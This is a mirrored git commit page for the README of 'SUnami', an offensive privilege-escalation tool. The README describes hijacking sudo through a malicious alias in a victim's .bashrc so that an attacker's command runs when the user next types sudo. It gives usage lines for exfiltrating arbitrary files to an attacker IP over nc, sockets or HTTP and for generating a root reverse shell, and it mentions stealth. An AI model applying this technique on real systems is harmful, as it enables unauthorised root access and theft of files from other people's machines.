Witchdocsec
/
SUnami
mirror of https://github.com/witchdocsec/SUnami.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update README.md

main
witchdocsec 2023-06-12 18:08:14 +01:00 committed by GitHub
parent ae6de7101a
commit df7f9a6d45
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
README.md
View File

@ -4,14 +4,18 @@
This is not an exploit just a cheap but effective trick. The usecase is when you have a shell on a sudoers account but no sudo cred.
It works by manipulating sudo via aliasing in their .bashrc file to prepend a malicious attacker specified command first in the background.
This does mean you will need to wait for sudo to be executed.
flags denoted with -- are required. with - optional.
the -local flag denotes that you want sunami to modify the .bashrc file on the current machine instead of producing output (not suggested for stealth reasons).
# File Exfiltration
I used passwd so as not to leak my hash for this demo but rest assured you can read whatever file you wish
![image](https://github.com/witchdocsec/SUnami/assets/107813117/a7f26322-5fca-4030-9725-13dc5a02ac44)
## useage:
python3 sunami.py exfilfile [-local {1,0}] [--file FILE] [--method {postflask,nc,pysocket}] [--ip IP] [--port PORT]
# Root Shell
![image](https://github.com/witchdocsec/SUnami/assets/107813117/06000a59-b7da-45f3-8258-89618aa02a1f)
## useage:
sunami.py genshell [-local {1,0}] [--ip IP] [--port PORT] [-shell SHELL] [-protocol PROTOCOL] [-listen {1,0}]